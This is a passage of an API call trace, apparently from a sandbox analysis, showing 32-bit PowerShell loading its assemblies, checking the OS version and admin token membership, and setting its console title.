	[0113.495] GetLastError () returned 0xcb
	[0114.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10e520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0114.776] GetLastError () returned 0x0
	[0114.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10e520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0114.777] GetLastError () returned 0x0
	[0115.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0115.210] GetLastError () returned 0xcb
	[0115.305] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0115.305] GetLastError () returned 0xcb
	[0115.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0115.490] GetLastError () returned 0x7e
	[0115.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0115.491] GetLastError () returned 0x7e
	[0118.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10e520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0118.016] GetLastError () returned 0x2
	[0118.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10e520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0118.017] GetLastError () returned 0x2
	[0118.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0118.792] GetLastError () returned 0x57
	[0118.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0118.792] GetLastError () returned 0x57
	[0119.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10e520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0119.793] GetLastError () returned 0x2
	[0119.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10e520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0119.793] GetLastError () returned 0x2
	[0120.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10e520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0120.914] GetLastError () returned 0x2
	[0120.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10e520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0120.914] GetLastError () returned 0x2
	[0121.394] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.394] GetLastError () returned 0xcb
	[0121.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0121.396] GetLastError () returned 0xcb
	[0121.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e598, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0121.396] GetLastError () returned 0xcb
	[0121.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e598, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0121.396] GetLastError () returned 0xcb
	[0122.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e598, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0122.338] GetLastError () returned 0xcb
	[0123.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x10e52c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0123.100] GetLastError () returned 0x2
	[0123.100] SetErrorMode (uMode=0x1) returned 0x1
	[0123.100] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x10e9d4 | out: lpFileInformation=0x10e9d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0123.101] GetLastError () returned 0x2
	[0123.101] SetErrorMode (uMode=0x1) returned 0x1
	[0128.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0128.085] GetLastError () returned 0x0
	[0128.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e598, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0128.085] GetLastError () returned 0x0
	[0128.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e598, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0128.087] GetLastError () returned 0x0
	[0128.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0128.093] GetLastError () returned 0xcb
	[0128.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0128.097] GetLastError () returned 0xcb
	[0128.098] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0128.098] GetLastError () returned 0xcb
	[0128.100] CoCreateGuid (in: pguid=0x10eab4 | out: pguid=0x10eab4*(Data1=0x271bb936, Data2=0x3cf6, Data3=0x4af9, Data4=([0]=0x9e, [1]=0x74, [2]=0x80, [3]=0x91, [4]=0x91, [5]=0xd7, [6]=0x71, [7]=0x8a))) returned 0x0
	[0128.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0128.104] GetLastError () returned 0xcb
	[0128.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0128.107] GetLastError () returned 0xcb
	[0128.234] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0128.234] GetLastError () returned 0xcb
	[0128.242] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0128.243] GetLastError () returned 0x0
	[0128.245] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x10e994 | out: lpConsoleScreenBufferInfo=0x10e994) returned 1
	[0128.245] GetLastError () returned 0x0
	[0128.251] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0128.251] GetLastError () returned 0x0
	[0128.251] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x10e994 | out: lpConsoleScreenBufferInfo=0x10e994) returned 1
	[0128.251] GetLastError () returned 0x0
	[0128.252] GetVersionExW (in: lpVersionInformation=0x584bd8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x584bd8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0128.252] GetLastError () returned 0x0
	[0128.254] GetCurrentProcess () returned 0xffffffff
	[0128.254] GetLastError () returned 0x3f0
	[0128.255] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x10e9a4 | out: TokenHandle=0x10e9a4*=0x1e8) returned 1
	[0128.255] GetLastError () returned 0x3f0
	[0128.256] GetTokenInformation (in: TokenHandle=0x1e8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10e9fc | out: TokenInformation=0x0, ReturnLength=0x10e9fc) returned 0
	[0128.257] GetLastError () returned 0x7a
	[0128.257] GetTokenInformation (in: TokenHandle=0x1e8, TokenInformationClass=0x8, TokenInformation=0x5d6ea8, TokenInformationLength=0x4, ReturnLength=0x10e9fc | out: TokenInformation=0x5d6ea8, ReturnLength=0x10e9fc) returned 1
	[0128.257] GetLastError () returned 0x7a
	[0128.259] DuplicateTokenEx (in: hExistingToken=0x1e8, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x10e9b4 | out: phNewToken=0x10e9b4*=0x1e0) returned 1
	[0128.259] GetLastError () returned 0x7f
	[0128.259] GetTokenInformation (in: TokenHandle=0x1e8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10e9fc | out: TokenInformation=0x0, ReturnLength=0x10e9fc) returned 0
	[0128.259] GetLastError () returned 0x7a
	[0128.259] GetTokenInformation (in: TokenHandle=0x1e8, TokenInformationClass=0x8, TokenInformation=0x5d70f8, TokenInformationLength=0x4, ReturnLength=0x10e9fc | out: TokenInformation=0x5d70f8, ReturnLength=0x10e9fc) returned 1
	[0128.259] GetLastError () returned 0x7a
	[0128.260] CheckTokenMembership (in: TokenHandle=0x1e0, SidToCheck=0x295aedc*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x10e990 | out: IsMember=0x10e990) returned 1
	[0128.260] GetLastError () returned 0x7a
	[0128.260] CloseHandle (hObject=0x1e0) returned 1
	[0128.260] GetLastError () returned 0x7a
	[0128.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0128.260] GetLastError () returned 0x7a
	[0128.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e454, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0128.260] GetLastError () returned 0x7a
	[0128.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e454, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0128.260] GetLastError () returned 0x7a
	[0128.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e454, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0128.260] GetLastError () returned 0x7a
	[0128.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0128.466] GetLastError () returned 0x7a
	[0128.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e454, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0128.466] GetLastError () returned 0x7a
	[0128.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e454, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0128.466] GetLastError () returned 0x7a
	[0128.472] GetConsoleTitleW (in: lpConsoleTitle=0x5f1fc0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0128.623] GetLastError () returned 0x7a
	[0129.364] GetConsoleTitleW (in: lpConsoleTitle=0x5f1fc0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0129.364] GetLastError () returned 0x7a
	[0129.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e49c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.364] GetLastError () returned 0x7a
	[0129.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.364] GetLastError () returned 0x7a
	[0129.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.364] GetLastError () returned 0x7a
	[0129.368] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0129.368] GetLastError () returned 0x7a
	[0129.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e4d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.369] GetLastError () returned 0x7a
	[0129.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e484, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.369] GetLastError () returned 0x7a
	[0129.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e484, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.369] GetLastError () returned 0x7a
	[0129.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e484, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.369] GetLastError () returned 0x7a
	[0129.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e4d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.659] GetLastError () returned 0x7a
	[0129.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e484, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.659] GetLastError () returned 0x7a
	[0129.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e484, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.660] GetLastError () returned 0x7a
	[0129.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e4d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.660] GetLastError () returned 0x7a
	[0129.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e484, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.660] GetLastError () returned 0x7a
	[0129.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10e484, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.660] GetLastError () returned 0x7a
